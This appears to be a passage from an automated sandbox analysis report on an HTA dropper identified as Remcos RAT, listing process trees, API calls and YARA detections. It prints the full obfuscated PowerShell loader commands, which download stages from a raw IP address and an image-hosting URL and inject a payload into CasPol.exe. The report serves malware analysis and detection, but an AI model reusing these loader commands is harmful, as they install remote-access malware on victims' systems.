MiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004158B9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E487B08_2_02E487B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E47FCD8_2_02E47FCD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004520E211_2_004520E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041D08111_2_0041D081
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043D0A811_2_0043D0A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043716011_2_00437160
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004361BA11_2_004361BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0042626411_2_00426264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043138711_2_00431387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041E5EF11_2_0041E5EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044C74911_2_0044C749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004267DB11_2_004267DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043C9ED11_2_0043C9ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00432A5911_2_00432A59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043CC1C11_2_0043CC1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00434D3211_2_00434D32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043CE4B11_2_0043CE4B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00440E3011_2_00440E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00426E8311_2_00426E83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00412F4511_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00452F1011_2_00452F10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00426FBD11_2_00426FBD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338B5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FC0 appears 55 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2071
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2038
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2071Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2038Jump to behavior
                    Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041A64F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00419BD4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-QEQMVZ
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3516:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjzaxl5k.l2g.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: nicegirlforyou.htaReversingLabs: Detection: 26%
                    Source: nicegirlforyou.htaVirustotal: Detection: 29%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\nicegirlforyou.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFAE8.tmp" "c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2